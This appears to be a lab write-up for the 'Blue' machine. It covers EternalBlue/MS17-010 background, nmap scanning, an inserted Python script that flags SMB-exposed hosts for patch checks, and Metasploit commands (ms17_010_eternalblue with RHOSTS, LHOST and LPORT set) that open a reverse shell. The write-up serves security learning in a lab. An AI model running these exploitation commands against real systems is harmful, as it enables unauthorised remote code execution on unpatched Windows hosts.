Difficulty Level: ⭐
Blue is a machine vulnerable to EternalBlue, a remote code execution flaw in the SMB protocol (port 445) that Microsoft patched in MS17-010.
Summary:
At the end of the writeup I'll give you a summary of the entire machine, in English and Spanish 🥳.
IMPORTANT: You must have a virtual machine or an auditing operating system with root privileges and an Internet connection.
Methodology to be used:
EternalBlue is an exploit allegedly developed by the U.S. National Security Agency (NSA). It was stolen and then leaked by "The Shadow Brokers", and was later used in one of the most damaging ransomware attacks in history, WannaCry. EternalBlue targets the vulnerability registered as CVE-2017-0144, a security flaw in Microsoft's Server Message Block (SMB) protocol. Microsoft released the security patch for this vulnerability, MS17-010, in March 2017. Attacks using EternalBlue mainly affected hospitals, police stations and, more generally, organizations around the world.
[Figure: versions affected by MS17-010 / CVE-2017-0144]
Let's start with the reconnaissance phase. Our IP is 10.8.42.68 and the target is 10.10.90.82.
ping -c 1 10.10.90.82
nmap -sn 10.10.90.82
sudo su
nmap 10.10.90.82 -p- -sV -oN all_ports.nmap -Pn --min-rate 5000
or
sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.90.82 -oG Escaneo
Output:
Port 445/tcp (microsoft-ds, Windows 7) is open; this is the port through which the vulnerability will be exploited.
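When the scan is saved in grepable format (the `-oG Escaneo` option above), the result can be triaged automatically: the following Python script, added here as an example and not part of the original writeup, parses nmap's `-oG` "Ports:" lines and flags every host exposing SMB (139/445) as a candidate for MS17-010 patch verification. The sample output, host 10.10.90.83 and the function names are constructed for the example.

```python
from typing import Dict, List, Tuple

# Constructed sample of nmap -oG output, modelled on the scan in the writeup
# (the second host and its services are invented for the example).
SAMPLE_GNMAP = """\
# Nmap 7.93 scan initiated as: nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.90.82 -oG Escaneo
Host: 10.10.90.82 ()\tStatus: Up
Host: 10.10.90.82 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///\tIgnored State: filtered (65531)
Host: 10.10.90.83 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (65533)
# Nmap done -- 2 IP addresses (2 hosts up) scanned
"""

# SMB is reachable over NetBIOS session (139) and direct-hosted SMB (445).
SMB_PORTS = {139, 445}

PortEntry = Tuple[int, str, str, str]  # (port, state, protocol, service)


def parse_gnmap(text: str) -> Dict[str, List[PortEntry]]:
    """Return {host: [(port, state, proto, service), ...]} for each 'Ports:' line.

    Grepable output is tab-separated; each port entry has the shape
    port/state/proto/owner/service/rpcinfo/version/ (most fields may be empty).
    """
    hosts: Dict[str, List[PortEntry]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comments and the trailing summary line
        fields = line.split("\t")
        host = fields[0].split()[1]
        ports_field = next((f for f in fields if f.startswith("Ports:")), None)
        if ports_field is None:
            continue  # e.g. the "Status: Up" line carries no port data
        entries = ports_field[len("Ports:"):].strip().split(", ")
        for entry in entries:
            parts = entry.split("/")
            if len(parts) < 5 or not parts[0].isdigit():
                continue  # malformed entry; skip rather than crash
            hosts.setdefault(host, []).append(
                (int(parts[0]), parts[1], parts[2], parts[4])
            )
    return hosts


def smb_exposed_hosts(text: str) -> List[str]:
    """Hosts with at least one SMB port in state 'open', in scan order."""
    result = []
    for host, entries in parse_gnmap(text).items():
        if any(p in SMB_PORTS and state == "open" for p, state, _, _ in entries):
            result.append(host)
    return result


def triage_report(text: str) -> List[str]:
    """One line per SMB-exposed host, listing the open SMB services to verify."""
    lines = []
    for host, entries in parse_gnmap(text).items():
        smb = [f"{p}/{proto} ({svc})" for p, state, proto, svc in entries
               if p in SMB_PORTS and state == "open"]
        if smb:
            lines.append(f"{host}: SMB exposed on {', '.join(smb)} "
                         f"-> confirm MS17-010 is installed and SMBv1 is disabled")
    return lines


if __name__ == "__main__":
    for line in triage_report(SAMPLE_GNMAP):
        print(line)
```

In a real lab run you would pass the contents of the `Escaneo` file to `triage_report` instead of the embedded sample; the script only reads scan output and produces a list of hosts whose patch level needs checking.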
msfconsole
> search ms17-010
or
> search eternalblue
> use exploit/windows/smb/ms17_010_eternalblue
or
> use 0
> show options
> set RHOSTS 10.10.90.82
> set LPORT 65000
> set LHOST 10.8.42.68
> run
> search ms17-010
Later on I will show how to perform penetration tests against different systems in your lab.